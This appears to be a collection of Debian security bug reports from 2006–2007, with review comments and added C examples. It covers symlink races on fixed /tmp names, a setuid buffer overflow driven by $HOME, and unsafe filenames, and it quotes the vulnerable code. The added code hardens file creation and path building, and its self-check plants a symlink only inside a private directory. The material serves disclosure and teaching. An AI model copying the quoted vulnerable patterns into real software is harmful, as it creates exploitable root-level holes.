-if((fp=fopen("/tmp/gsambadtmp", "r"))==NULL) // FIXME: Static paths
+if((fp=fopen(filename, "r"))==NULL) // FIXME: Static paths
 {
+/*  free memory */
+free( filename );
+
 	/* Dont show a popup */
 return;
 }
+
+/*  free memory */
+free( filename );
+
 fseek(fp, 0, SEEK_END);
 file_size = ftell(fp);
 rewind(fp);
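Review bot: tempnam() does not create anything, it only returns a currently unused name, so the comment `/* make a secure temporary file */` is not true: the file is still created by `touch %s` inside the popen()ed shell, and a local user who guesses or races the name can plant a symlink at it exactly as with the fixed /tmp/gsambadtmp (tempnam() also consults TMPDIR when set). Create the file atomically with mkstemp() (O_CREAT|O_EXCL, mode 0600) and hand that name to smbstatus, which also removes the need for `touch && chmod`. Two further points on these lines: tempnam() can return NULL, which is then passed straight to snprintf() and free(); and the file is never unlink()ed after it is read, so one is left behind per invocation (the old code had the same omission). The `2>&1> %s` ordering is unchanged and still sends stderr to stdout rather than into the file.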


Bug#431336: CVE-2007-2835 : Buffer overflow.

2007-07-01 Thread Steve Kemp
Package: unicon-imc2
Version: 3.0.4-11
Severity: grave
Usertags: sourcescan

*** Please type your report below this line ***

  CVE-2007-2835 : Allows local root compromise via zhcon.

  Anyway, the setuid(0) zhcon application links to this library,
 which contains a buffer overflow which may be used to gain root.
 (Actually any application using this library can be exploited; 
 this is the only setuid one I could spot.)

  The source of this problem is ./unicon/ImmModules/cce/CCE_pinyin.c:

#include <stdio.h>   /* sprintf */
#include <stdlib.h>  /* getenv */

static int
IMM_Flush ()
{
  char name[256];
  /* HOME is supplied by the invoking user and unbounded: sprintf writes past
   * name[256] once HOME plus the suffix exceeds 255 bytes, and passes NULL
   * to "%s" if HOME is unset. */
  sprintf(name,"%s/.pyinput/usrphrase.tab",getenv("HOME"));
  SaveUsrPhrase(name);
  sprintf(name,"%s/.pyinput/sysfrequency.tab",getenv("HOME"));
  SavePhraseFrequency(name);

  return 1;
}

  There are similar problems in the file /unicon/ImmModules/cce/xl_pinyin.c
 too.


Steve
-- 
# Commercial Debian GNU/Linux Support
http://www.linux-administration.org/
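As an added example (not unicon's code), a bounded replacement for the sprintf() calls above, plus a home-directory lookup that ignores $HOME when the process is setuid, with a constructed check sized to the report's name[256] buffer; pyinput_path, trusted_home and demo_home_paths are hypothetical names.

```c
#include <pwd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Hypothetical bounded replacement for
 *   sprintf(name, "%s/.pyinput/usrphrase.tab", getenv("HOME"));
 * Writes "<home>/.pyinput/<leaf>" into out[outsz]. Returns the length, or -1
 * when home is NULL or not absolute, leaf is empty, or the result does not
 * fit. Truncation is detected from snprintf()'s return value rather than
 * hidden, and a failed call leaves an empty string, never a partial path. */
int pyinput_path(char *out, size_t outsz, const char *home, const char *leaf)
{
    if (out == NULL || outsz == 0)
        return -1;
    out[0] = '\0';
    if (home == NULL || home[0] != '/' || leaf == NULL || leaf[0] == '\0')
        return -1;
    int n = snprintf(out, outsz, "%s/.pyinput/%s", home, leaf);
    if (n < 0 || (size_t)n >= outsz) {
        out[0] = '\0';
        return -1;
    }
    return n;
}

/* Which home directory to trust. Inside a setuid binary the environment is
 * chosen by the unprivileged invoker, so $HOME is ignored there in favour of
 * the password database entry for the real uid. May return NULL. */
const char *trusted_home(void)
{
    if (getuid() != geteuid()) {
        struct passwd *pw = getpwuid(getuid());
        return pw ? pw->pw_dir : NULL;
    }
    return getenv("HOME");
}

/* Constructed check mirroring the char name[256] in IMM_Flush().
 * Returns 0 on success, or the number of the step that failed. */
int demo_home_paths(void)
{
    char name[256];
    char longhome[300];

    /* ordinary home: fits, exact length returned */
    if (pyinput_path(name, sizeof name, "/home/steve", "usrphrase.tab") != 34)
        return 1;
    if (strcmp(name, "/home/steve/.pyinput/usrphrase.tab") != 0)
        return 2;

    /* 299-byte HOME, the case that overflows unicon: rejected, buffer empty */
    memset(longhome, 'A', sizeof longhome - 1);
    longhome[0] = '/';
    longhome[sizeof longhome - 1] = '\0';
    if (pyinput_path(name, sizeof name, longhome, "sysfrequency.tab") != -1)
        return 3;
    if (name[0] != '\0')
        return 4;

    /* boundary: 232-byte HOME gives 255 characters (fits), 233 gives 256 */
    memset(longhome, 'B', 232);
    longhome[0] = '/';
    longhome[232] = '\0';
    if (pyinput_path(name, sizeof name, longhome, "usrphrase.tab") != 255)
        return 5;
    longhome[232] = 'B';
    longhome[233] = '\0';
    if (pyinput_path(name, sizeof name, longhome, "usrphrase.tab") != -1)
        return 6;

    /* unset or relative HOME */
    if (pyinput_path(name, sizeof name, NULL, "usrphrase.tab") != -1)
        return 7;
    if (pyinput_path(name, sizeof name, "pyinput", "usrphrase.tab") != -1)
        return 8;
    return 0;
}

int main(void)
{
    int rc = demo_home_paths();
    if (rc == 0)
        printf("bounded path building: ok (home source: %s)\n",
               trusted_home() ? trusted_home() : "(none)");
    else
        printf("step %d failed\n", rc);
    return rc;
}
```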






Bug#431332: CVE-2007-2837: Arbitrary file removal

2007-07-01 Thread Steve Kemp

Package: fireflier-server
Version: 1.1.6-3
Severity: grave
Usertags: sourcescan

*** Please type your report below this line ***

  Security issue: CVE-2007-2837.

  The server, fireflierd, runs with root privileges and the code
 contains this gem which I think speaks for itself:

string getRule(unsigned int chainid, int rulenum)
{
   ...

   cmd="rm -f /tmp/fireflier.rules && touch /tmp/fireflier.rules && chmod 0700 /tmp/fireflier.rules && ";
   cmd+=IPTABLES_SAVE;
   cmd+=" > /tmp/fireflier.rules";
   if(DEBUG)
 cout<<"cmd: "

Bug#431331: CVE-2007-2838: Allow arbitrary files to be created/truncated

2007-07-01 Thread Steve Kemp

Package: gsambad
Version: 0.1.5-5
Severity: grave
Usertags: sourcescan

*** Please type your report below this line ***

  Security issue: CVE-2007-2838
   
  The gsambad package contains a binary (which may only be
 executed by the root user) with the following code in it:


if((fp=popen("touch /tmp/gsambadtmp && chmod 600 /tmp/gsambadtmp && smbstatus 2>&1> /tmp/gsambadtmp", "w"))==NULL)
{
    /* Dont show a popup */
    return;
}

  This can be used to create/trash arbitrary files upon the system with
 a symlink attack.  

Steve
-- 
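As an added example (not gfax's or gsambad's code), two hardened ways to obtain the temporary files those reports create by fixed name in /tmp, plus a self-check that plants a symlink in a private directory the way the gfax report describes and confirms the hardened open refuses it; scratch_file_open, fixed_name_create and demo_symlink_refused are hypothetical names.

```c
#define _GNU_SOURCE 1          /* mkstemp, mkdtemp, symlink, O_NOFOLLOW */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical replacement for fopen("/tmp/crontab", "w") (gfax) and for
 * "touch /tmp/gsambadtmp && chmod 600 ..." (gsambad). mkstemp() picks the
 * name and creates the file in one step with O_CREAT|O_EXCL and mode 0600,
 * so a link planted under a guessable name is never followed and there is
 * no window between choosing the name and creating the file. `path`
 * receives the name so the caller can unlink() it. Returns an fd or -1. */
int scratch_file_open(const char *dir, char *path, size_t pathsz)
{
    int n = snprintf(path, pathsz, "%s/scratch.XXXXXX", dir);
    if (n < 0 || (size_t)n >= pathsz) {
        errno = ENAMETOOLONG;  /* refuse rather than use a truncated path */
        return -1;
    }
    return mkstemp(path);
}

/* For a name that has to be fixed (a pidfile, a lock file): O_EXCL makes
 * open() fail with EEXIST if anything is already there, including a
 * dangling symlink, so a pre-existing file owned by another user is refused
 * instead of being truncated and reused as the gfax report describes. */
int fixed_name_create(const char *path)
{
    int flags = O_WRONLY | O_CREAT | O_EXCL;
#ifdef O_NOFOLLOW
    flags |= O_NOFOLLOW;       /* belt and braces; O_EXCL alone suffices */
#endif
    return open(path, flags, 0600);
}

/* Constructed self-check: inside a private directory, plant
 * crontab -> victim (what a local user would do in /tmp), then confirm that
 * fixed_name_create() refuses the link, victim never appears, and
 * scratch_file_open() yields a fresh regular file readable only by us.
 * Returns 0, or the number of the step that failed. */
int demo_symlink_refused(void)
{
    const char *base = getenv("TMPDIR");
    char dir[512], lnk[600], victim[600], scratch[600], tiny[8];
    struct stat st;
    int rc = 0, fd;

    if (base == NULL)
        base = "/tmp";
    snprintf(dir, sizeof dir, "%s/tmpdemo.XXXXXX", base);
    if (mkdtemp(dir) == NULL)
        return 1;
    snprintf(lnk, sizeof lnk, "%s/crontab", dir);
    snprintf(victim, sizeof victim, "%s/victim", dir);
    if (symlink(victim, lnk) != 0) {
        rmdir(dir);
        return 2;
    }

    /* steps 3-5: the fixed name must be refused with EEXIST or ELOOP */
    fd = fixed_name_create(lnk);
    if (fd >= 0) {
        close(fd);
        rc = 3;
    } else if (errno != EEXIST && errno != ELOOP) {
        rc = 4;
    }
    if (rc == 0 && access(victim, F_OK) == 0)
        rc = 5;                /* the link target must not have been created */

    /* steps 6-7: the kernel-chosen name is created fresh, private to us */
    if (rc == 0) {
        fd = scratch_file_open(dir, scratch, sizeof scratch);
        if (fd < 0) {
            rc = 6;
        } else {
            if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
                st.st_nlink != 1 || (st.st_mode & 077) != 0)
                rc = 7;
            close(fd);
            unlink(scratch);
        }
    }
    /* step 8: a name that does not fit is an error, not a truncated path */
    if (rc == 0 && scratch_file_open(dir, tiny, sizeof tiny) != -1)
        rc = 8;

    unlink(lnk);
    unlink(victim);
    rmdir(dir);
    return rc;
}

int main(void)
{
    int rc = demo_symlink_refused();
    if (rc == 0)
        printf("symlink refused, scratch file private: ok\n");
    else
        printf("step %d failed\n", rc);
    return rc;
}
```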





Bug#430691: [EMAIL PROTECTED]

2007-06-27 Thread Steve Kemp
On Wed Jun 27, 2007 at 11:29:12 +0900, Taku YASUI wrote:

> I'll upload new upstream version to sid soon.
> And I attach the patch to fix this problem.

  Great, thanks.

  If you could tell us which version in Sid would fix the problem
 I can include that in the advisory.

Steve
-- 





Bug#430691: hiki: [security] vulnerability that arbitrary files would be deleted

2007-06-26 Thread Steve Kemp
>  Hiki 0.8.0 - 0.8.6 is affected, it means that stable, testing and unstable
>  packages in Debian are affected. Please update hiki package.
> 
>  For more detail, see http://hikiwiki.org/en/advisory20070624.html

  Joey if you could allocate an ID I'll upload a fixed package.

Steve
-- 





Bug#430012: CVE-2006-4168: Integer overflow vulnerability fixed in 0.6.16

2007-06-21 Thread Steve Kemp
On Thu Jun 21, 2007 at 20:16:41 +0200, Stefan Fritsch wrote:

> CVE-2006-4168:
> "Integer overflow in the exif_data_load_data_entry function in
> libexif/exif-data.c in Libexif before 0.6.16 allows remote attackers to
> cause a denial of service (application crash) or execute arbitrary code
> via an image with many EXIF components, which triggers a heap-based
> buffer overflow."
> 
> This is fixed in 0.6.16, see
> http://sourceforge.net/project/shownotes.php?release_id=515385

  This was already fixed, for Sarge + Etch:


http://lists.debian.org/debian-security-announce/debian-security-announce-2007/msg00070.html

http://lists.debian.org/debian-security-announce/debian-security-announce-2007/msg00071.html

Steve
--





Bug#429218: [CVE-2007-3125] format string issue in X.509 certificate processing

2007-06-18 Thread Steve Kemp
  Fixed already in Stable (etch):

  w3m (0.5.1-5.1) unstable; urgency=high

* NMU by the Security Team:
* Fix format string vulnerability in display of SSL certificates.
 (No CVE ID yet) (Closes: #404564)

   -- Moritz Muehlenhoff <[EMAIL PROTECTED]>  Tue, 26 Dec 2006 18:49:26 +0100

Steve
-- 
Debian GNU/Linux System Administration
http://www.debian-administration.org/






Bug#424690: CVE-2007-1673: denial of service (infinite loop) in zoo and unzoo

2007-06-18 Thread Steve Kemp

  I see no copy of the vulnerable code in the Debian version of unzoo,
 I suspect this is only an issue for the non-free version of unzoo,
 which we'll not release an update for.

  Comments?

Steve
-- 
# Commercial Debian GNU/Linux Support
http://www.linux-administration.org/






Bug#429191: flyspray phpmailer: not relevant for stable

2007-06-17 Thread Steve Kemp
On Sun Jun 17, 2007 at 18:20:01 +0200, Thijs Kinkhorst wrote:

> For stable I've checked whether it's 
> vulnerable and I believe it's not: the vulnerability is in the SendmailSend() 
> function. That requires for the calling code to actually use the sendmail 
> method, which Flyspray does not allow in any configuration.
> 
> I suppose the security team does not send advisories for insecure code that 
> is 
> not called?

  Agreed.

> As an additional note: sarge is not vulnerable because it doesn't contain a 
> copy of the phpmailer class at all.

  :)

  So we don't need to do anything, perfect!

Steve
-- 






Bug#425625: CVE-2007-2754: integer overflow and heap-based buffer overflow vulnerability in freetype

2007-05-30 Thread Steve Kemp
On Wed May 30, 2007 at 06:19:29 -0700, Steve Langasek wrote:

> Signed package for etch is on its way up to
>  right now (built with -sa, so
> should indeed be ready for upload straight to security-master).

  Thanks a lot, Steve.

> Let me know if there's anything else you need from me for etch.  

  Looks good, thanks.  I'll upload tomorrow with an aim of getting
 it released on Friday.

> I haven't
> yet looked into whether this bug affects the sarge version of the package,
> I'll do that next (unless somebody here already knows the answer).

  I was under the impression that it wasn't vulnerable, but I admit
 I've not yet checked.  If we've not heard back by the time I make 
 the upload I'll take a look myself.

Steve
-- 
http://www.steve.org.uk/





Bug#425625: CVE-2007-2754: integer overflow and heap-based buffer overflow vulnerability in freetype

2007-05-29 Thread Steve Kemp
On Sun May 27, 2007 at 12:47:58 +0200, Moritz Muehlenhoff wrote:

> I guess we should fix this, it's indirectly remotely exploitable at least
> by providing someone a malformed TTF font file. As libfreetype is an important
> infrastructure library there might also be unforeseen indirect attack
> vectors, like embedding TTFs in other document types, etc.

  Agreed.

> Steve Kemp wanted to work on a DSA, so you should probably check back
> with him before preparing an upload.

  I was planning on handling this yes, so if there were a fixed package
 available for Etch then I'd appreciate seeing it.

Steve
-- 
Debian GNU/Linux System Administration
http://www.debian-administration.org/






Bug#404233: CVE-2006-6678: Netrik arbitrary command execution

2006-12-22 Thread Steve Kemp
On Fri, Dec 22, 2006 at 06:42:41PM +0100, Stefan Fritsch wrote:

> A vulnerability has been reported in Netrik:

  Thanks for the report.  Security update for Sarge is building now.

  Patch attached:

Steve
-- 

--- form-file.c 2003-08-06 10:28:45.0 +
+++ /home/skx/form-file.c   2006-12-22 22:19:12.0 +
@@ -10,6 +10,7 @@
  * (C) 2003 antrik
  */

+#include 
 #include 
 #include 
 #include 
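Review bot: the header names on all four `#include` lines have been stripped in this archive copy (the angle-bracketed names were presumably eaten as markup), so it is not visible which header the `+` line adds; whichever it is, the isalnum() call in the next hunk needs <ctype.h> to be among them, which should be verified against the actual patch.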
@@ -107,6 +108,14 @@
   char temp_name[size];
   snprintf(temp_name, size, format, name);

+  /* make sure we get a proper filename */
+  {
+char   *chr;
+for(chr=temp_name; *chr; ++chr)
+   if(!isalnum(*chr))/* not safe filename char -> replace */
+  *chr='_';
+  }
+
   /* write temporary file */
   {
 intfildes;
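Review bot: `isalnum(*chr)` with a plain `char` is undefined for bytes above 0x7F (negative values), which a form-supplied name can easily contain; use `isalnum((unsigned char)*chr)`. The loop also sweeps the whole of temp_name after snprintf(), so if `format` contributes a directory prefix, its '/' and '.' characters are rewritten to '_' as well and the file ends up under a mangled relative name; sanitise `name` before formatting, or start the loop past the fixed prefix. Note for the advisory text that the fix also changes behaviour for legitimately named files containing '-' or '.'.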






Bug#398936: libapache2-mod-ifier: The module breaks POST processing

2006-11-16 Thread Steve Kemp
Package: libapache2-mod-ifier
Version: 0.8-2
Severity: grave
Justification: renders package unusable


  This module, when installed and enabled, breaks all processing of
 POST requests.

  It should be removed from Etch until it can be updated to work
 correctly.

-- System Information:
Debian Release: 4.0
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: i386 (i686)
Shell:  /bin/sh linked to /bin/bash
Kernel: Linux 2.6.18-1-486
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)

Versions of packages libapache2-mod-ifier depends on:
ii  apache2.2-common 2.2.3-3.1   Next generation, scalable, extenda
ii  libc62.3.6.ds1-8 GNU C Library: Shared libraries

libapache2-mod-ifier recommends no packages.

-- no debconf information





Bug#396277: allows creating any file as root

2006-10-31 Thread Steve Kemp

Daniel

  Please find attached the patch I'm going to use for the security
 update.

  Could you please apply it, or a comparable patch to the version
 in unstable and let us know which version will fix the problem?

Steve
-- 
# The Debian Security Audit Project.
http://www.debian.org/security/audit

[EMAIL PROTECTED]:/tmp$ interdiff thttpd_2.23beta1-3sarge1.diff  
thttpd_2.23beta1-3sarge2.diff
diff -u thttpd-2.23beta1/debian/changelog thttpd-2.23beta1/debian/changelog
--- thttpd-2.23beta1/debian/changelog
+++ thttpd-2.23beta1/debian/changelog
@@ -1,3 +1,11 @@
+thttpd (2.23beta1-3sarge2) stable-security; urgency=high
+
+  * Non-maintainer upload by the Security Team.
+  * Fix the insecure use of temporary files when invoked by logrotate.
+[CVE-2006-4248]
+
+ -- Steve Kemp <[EMAIL PROTECTED]>  Tue, 31 Oct 2006 17:49:34 +
+
 thttpd (2.23beta1-3sarge1) stable-security; urgency=high

   * Non-maintainer upload by the Security Team
diff -u thttpd-2.23beta1/debian/thttpd.logrotate 
thttpd-2.23beta1/debian/thttpd.logrotate
--- thttpd-2.23beta1/debian/thttpd.logrotate
+++ thttpd-2.23beta1/debian/thttpd.logrotate
@@ -4,15 +4,9 @@
 compress
 missingok
 delaycompress
-prerotate
-   if pidof thttpd 2>&1 > /dev/null; then
-   touch /tmp/start_thttpd
-   fi
-endscript
 postrotate
-   if [ -f /tmp/start_thttpd ]; then
+if [ -f /var/run/thttpd.pid ]; then
/etc/init.d/thttpd restart 2>&1 > /dev/null
-   rm -f /tmp/start_thttpd
fi
 endscript
 }
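Review bot: testing for the pidfile instead of for a running process changes the semantics in both directions: a stale /var/run/thttpd.pid left by a crash now makes postrotate run `restart` (which starts the server), and a thttpd started without writing that pidfile is no longer restarted and keeps logging to the rotated file. Since /var/run is root-owned the symlink problem is gone, which is the point, but `if pidof thttpd >/dev/null; then ... fi` directly in postrotate would keep the original intent without any temporary file at all. On the unchanged line between, `2>&1 > /dev/null` sends stderr to the terminal and only stdout to /dev/null; `> /dev/null 2>&1` is what was presumably meant. The new `if` line has also lost the indentation of the line it replaces.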





Bug#396277: allows creating any file as root

2006-10-31 Thread Steve Kemp
On Mon, Oct 30, 2006 at 10:56:28PM +0100, Marco d'Itri wrote:

> By creating a /tmp/start_thttpd symlink a local attacker will be able to
> create/touch any file as root.

  Thanks for the report.  Once I get a CVE identifier allocated I'll
 handle an update for Sarge.

  Daniel if you have a preferred patch that would be appreciated,
 otherwise I'll come up with a solution and add it to this bug.

Steve
-- 





Bug#394637: gaim-encryption plugin does not load

2006-10-22 Thread Steve Kemp
On Sun, Oct 22, 2006 at 01:08:18PM +0200, Jan Strnad wrote:

> Package: gaim-encryption
> Version: 3.0~beta5-3
> Severity: critical
> Tags: security
> Justification: root security hole

  This doesn't appear to have any security implications.  Certainly
 not a root hole.

  Sure you could argue that not having encryption is a security
 issue; but installing this package will not cause your machine to
 become vulnerable in any realistic fashion.

  Please re-classify accordingly.

Steve
-- 




Bug#381376: Status of CVE-2006-3918 #381376

2006-09-10 Thread Steve Kemp
On Sat, Sep 09, 2006 at 01:22:25PM +0200, Stefan Fritsch wrote:
> On Saturday 09 September 2006 12:35, Loïc Minier wrote:
> >  I think only apache was uploaded for CVE-2006-3918, and not
> > apache2. Do you intend to issue a DSA for apache2 as well?  Or
> > isn't it affected by the vulnerability?
> >
> >  This is fixed in apache2 >= 2.0.55-4.1 in unstable.
> 
> The issue is less severe for apache2 because it is much more difficult 
> to exploit: apache2 will first wait for the request timeout (usually 
> 5 minutes) before sending the problematic error message.

  I have a pending upload of Apache2 for this, but I've been
 unexpectedly busy.  I did intend it to be a day or two after
 the apache update.

  All being well I'll get it released tomorrow.  If not it will
 have to be midweek.

Steve
--





Bug#380231: [CVE-2006-3747] Off-by-one flaw exists in the Rewrite module, mod_rewrite

2006-07-28 Thread Steve Kemp
On Fri, Jul 28, 2006 at 05:06:38PM +0200, Daniel Leidert wrote:

> The latest release notes [1] of apache 1.3.37, 2.0.59 and 2.2.3 contain a
> note about an off-by-one flaw (CVE-2006-3747 [2]).
> 
> [1] http://www.apache.org/dist/httpd/Announcement2.2.html
> [2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3747
> 
> Please check, if the Debian package(s) is/are vulnerable.

  apache + apache2 packages are affected.  DSA in preparation.

  Thanks for the report.

  (Please see also #380182)

Steve
-- 




Bug#380182: Confirmed

2006-07-28 Thread Steve Kemp
  A security advisory is pending.

  This bug applies to both the apache and apache2 packages.  Same 
 fix in both packages, but in different locations...

Steve
-- 






Bug#379174: Shadow security update for CVE-2006-3378

2006-07-23 Thread Steve Kemp
On Sun, Jul 23, 2006 at 06:16:00PM +0200, Christian Perrier wrote:
> Hello dear Security team (and ftpmasters, and shadow package maintainers),
> 
> Being back from 2 days holiday I discover CVE-2006-3378 which has just
> been revealed to our attention (#359174 in the BTS).

  I guess you mean #379174 here?

> What I propose to you, as soon as we have a fix for CVE-2006-3378:
> 
> 
> -urgently destroy 4.0.3-31sarge6 and 31sarge7 from the
>  proposed-updates queue. Need ftpmasters collaboration with high urgency
> -the security team, or the shadow package team, prepares
>  4.0.3-31sarge6 with the fix for CVE-2006-3378 *ALONE*
> -the shadow package team prepares 4.0.3-31sarge7 with BOTH updates and
>  sends it to the proposed-updates queue so that it can be picked by the
>  SRM team when they're ready to update sarge
> 

  Sounds fine from the security point of view.  Once a patch is
 available at least.

Steve
-- 




Bug#379347: xen-tools: xen-create image fails at xt-create-image

2006-07-22 Thread Steve Kemp
On Sun, Jul 23, 2006 at 01:27:51AM +0200, Henning Sprang wrote:

> Actually, that helped, as said before, but it is not clear, or even
> evident, that --debootstrap/--rpmstrap must be given from the manpage,

  I think it is - from "man xen-create-image":

--cut--

INSTALLATION METHODS
 The new guest images may be installed in several different ways:

 1.  With the B<debootstrap> command.
 2.  With the B<rpmstrap> command.
 3.  By copying an existing installation.
 4.  By untarring a file containing a previous installation.

 These different methods can be selected by either the command line
arguments, or settings in the configuration file.

--cut--

  (Hmm, that should be "--debootstrap option" and "--rpmstrap option"
 respectively.  Will update that.)

> and it also seems unreasonable - you can't install sarge/etch with
> rpmstrap, and you can't install centos or fedora with debootstrap. But
> maybe you are working on a secret dpkg for centos?! :)

  I guess that is true - but you might want to install "sarge" by untarring, or 
 copying a previously created image.  So "dist=sarge" cannot be assumed to
 mean "debootstrap".

  That's the main reason why these are distinct, and mutually exclusive, 
 options.

> Severity still important in my opinion because the tool isn't usable
> without major tweaking around with all the options.

  I will update the code to ensure at least one option is supplied for
 the installation method, which I will regard as closing this bug.

  (ie in your example it would output a message and exit:

"please choose one of the following options:
--debootstrap - Install with debootstrap
--rpmstrap    - Install the dist with rpmstrap
--copy        - Copy from the selected directory .. etc")

 
  However I disagree utterly with the "major tweaking", because this
 option could be specified in the configuration file as the comments
 indicate.

  I have to assume that people attempting to use software will examine
 the configuration file.  Otherwise you could claim that apt-get is
 broken because the default configuration file doesn't point to a 
 local mirror without "major tweaking".

  .. still I'm glad you got it working now :)

Steve
--






Bug#379347: further tests - no success

2006-07-22 Thread Steve Kemp
On Sun, Jul 23, 2006 at 01:03:33AM +0200, Henning Sprang wrote:

> I also tried the same with a loopback disk image - no success.

  OK that is good to know.

> I do exactly what is documented, and have no idea how to investigate
> the problem further.

  I've given you things to try.  The most obvious is adding
 "--dist=sarge --debootstrap".

  If that fails too then add "--verbose" so that all the diagnostics
 are available.

> Let me know what I can try to give more help on solving this bug.

  I have.  Twice now.

> Maybe the call to the external program should not be made in a way that
> analyzing problems is impossible, and there should be a way to keep
> the tmp data.

  You can, it is stored in the LVM file you specified.  Simply mount it.

  (If you used the loopback image you could also mount that after the
 failure occurs).


Steve
-- 





Bug#379347: xen-tools: xen-create image fails at xt-create-image

2006-07-22 Thread Steve Kemp
On Sun, Jul 23, 2006 at 12:42:28AM +, Henning Sprang wrote:
> Package: xen-tools
> Version: 2.1-3
> Severity: grave
> Justification: renders package unusable

  Grave seems a little extreme since the package clearly works for
 some.  However I'm happy to leave it there for a day or two at
 least until I can update documentation to be better.

> when running 
>  xen-create-image --size=5Gb --swap=1024Mb --dhcp --lvm=virtualmachines 
> --hostname=fasel --kernel=/boot/vmlinuz-2.6.16-xen 
> --initrd=/boot/initrd-2.6.16-xen.img --force

  It looks like you're missing an installation method.  Please add:

--dist=sarge --debootstrap

  This might be all you need. 

  It isn't clear whether you've modified the global configuration
 file /etc/xen-tools/xen-tools.conf, I will assume you haven't since 
 if you had you could have setup the various options that you've specified 
 there.

> --- start message ---
> Creating ext3 filesystem on /dev/virtualmachines/fasel-disk
> Done
> 
> Installing your system with Running command '/usr/bin/xt-install-image 
> --location=/tmp/MqrYmFUWft --dist=sarge --cache=yes >/dev/null 2>/dev/null' 
> failed.
> --- end message ---

  This means it made the filesystems, etc, but failed to install with
 debootstrap/rpmstrap/copy/tar.  That could be because you didn't 
 specify one of those options, or it might be because one was specified
 in the configuration file but failed for some reason.

  I can't really tell just yet.


> Unfortunately, this message doesn't give any hint what could be done better, 
> and trying to run the given command to try to get more
> information doesn't help, because the temporary directory is removed already.

  Indeed the temporary directory has been removed, but you can create
 it and mount the previously created image from /dev/virtualmachines/fasel-disk
 if you do wish to explore.


> No idea how this package should be used.

  It seems you do have a reasonable idea, it is just unfortunate that
 this invocation didn't proceed correctly.  Running "man
 xen-create-image" might have been useful since it does cover the
 usage of the different installation methods, and the specification
 of the distribution you wish to install ..

  I'd suggest that you repeat the command with "--dist=sarge
 --debootstrap" as an initial step.  If that fails, or if you
 wish to generate more output please add "--verbose" and 
 send the log to this bug report.


Steve
-- 
http://www.steve.org.uk/





Bug#372531: Update of wzdftpd 0.5.2-1.1sarge1 for 3.1r3

2006-07-04 Thread Steve Kemp
On Tue, Jul 04, 2006 at 02:39:00PM +0200, Pierre Chifflier wrote:
> On Tue, Jul 04, 2006 at 02:30:10PM +0200, Julien Danjou wrote:
> > Hello,
> > 
> > The fix for DSA-1006-1 on wzdftpd broke dependencies as explained in bug
> > report #372531.
> > We would like to see this bug fixed in the next stable point-release.
> > 
> > Would it be possible to the security team to fix this package or maybe to 
> > the
> > maintainer to upload a new and fixed version of its package?
> > 
> > Please, keep us in touch, since we plan to point-release ASAP.
> > 
> 
> Hi,
> 
> Since the debian/control files uses only depends like:
> wzdftpd (= ${Source-Version})
> a simple rebuild should fix the problem.

  If you're not expecting a new advisory then building it yourself
 would be appreciated.

Steve
-- 





Bug#372719: regression in FreeType security fix for DSA-1095

2006-06-26 Thread Steve Kemp
On Sun, Jun 25, 2006 at 03:09:51PM -0700, Steve Langasek wrote:

> As mentioned earlier this month, a regression was found in the freetype
> 2.1.7-2.5 package uploaded for DSA-1095 which caused applications to crash
> with division-by-zero errors.  I've prepared a maintainer upload to fix
> this regression using the patch from bug #373581, which can be found at
> .
> 
> Can I upload this to security.d.o for a revised DSA?

  Yes, please do.

Steve
-- 




Bug#375267: xen-tools: FTBFS: Test failures

2006-06-24 Thread Steve Kemp
On Sat, Jun 24, 2006 at 05:21:32PM -0400, Daniel Schepler wrote:

> From my pbuilder build log:

  Good catch, thanks for reporting it.

> ...
> tests/getopt..ok 1 - File exists: ./bin/xen-create-image
> ok 2 - File is executable
> Cannot read file '/etc/xen-tools/xen-tools.conf' - No such file or directory 
> at ./bin/xen-create-image line 736.

  OK this is a stupid error on my part.

  What is happening here is that we attempt to run the following
 command:

./bin/xen-create-image --help

  This is done specifically so that we can capture the options
 which are allegedly supported by the tool.  Then we can actually
 ensure that every option advertised is actually available/used.

  This test was added recently as a result of:

#374987:  --fs is a unknown option

  However since the software isn't installed it aborts on
 failing to read the configuration file.  Typically I'd just
 add a "--test" flag, but that won't work in this case since
 we expect to read the configuration file and *then* parse the
 command line arguments!

  I will update the test shortly to avoid this execution.

  In the mean time removing "make test" from the debian/rules file
 will allow it to build... although this is clearly not an ideal
 solution.

  The test suite should be runnable without the software being installed
 and it mostly is...


Steve
-- 





Bug#374181: leaks potentialy sensitive information (e.g. passwords) to www.google.com

2006-06-17 Thread Steve Kemp
On Sat, Jun 17, 2006 at 10:30:40PM +0200, Robert Millan wrote:

> Thanks, it seems disabling "middlemouse.contentLoadURL" gets rid of the
> problem.  Could you make this the default?

  I think that is up to either 

a) Firefox upstream

b) The Debian firefox maintainers

  It certainly isn't the responsibility of the Security Team, so I'm
 not going to argue for or against.

Steve
-- 




Bug#374181: leaks potentialy sensitive information (e.g. passwords) to www.google.com

2006-06-17 Thread Steve Kemp
On Sat, Jun 17, 2006 at 08:01:22PM +0200, Robert Millan wrote:
> Package: firefox
> Severity: grave
> Tags: security

  Not a security bug.

> When pasting using X11 clipboard to a firefox window, unless the focus is in a
> specific place like the navigation bar or an edit box, it'll assume you want 
> to
> go to "keyword:$clipboard", which happens to be an alias for google "I'm 
> feeling
> lucky" search.

  This can be disabled.  Open "about:config" in your address bar, and
 enter "middle" in the filter window.  Click "show all" and you can
 disable various middle-click options.

Steve
-- 





Bug#370544: security.debian.org: virus netbot spam sending DNS squatting

2006-06-05 Thread Steve Kemp
On Mon, Jun 05, 2006 at 09:26:55PM +0200, Yves Jean Marie Lambert wrote:
> Package: security.debian.org
> Severity: critical
> Tags: security
> Justification: root security hole
> 
> "Enlarge your d1ck" spammers are using a security hole in debian :

  Which security hole?

> all zombified systems I have tested are running apache 2.054/debian PHP 
> 4.3.10.16
> the payload of the trojan began about on May the 23rd - I could manage and 
> fill in
> information about that at that date, I'm sorry not to have done that before. 
> see 

  All you've shown (told us) is that you have some compromised machines
 running PHP, Apache + Debian.  That is nowhere near enough to help
 resolve this and see if it is a Debian security issue or not.

  I'm tempted to just write it off as a security hole in a non-Debian
 PHP application, but more investigation would rule that out (or not).

  If you believe this is a Debian issue please:

1.  Tell us which version(s) of Debian are involved.

2.  Show which packages are installed.

3.  List any non-Debian locally installed PHP applications.

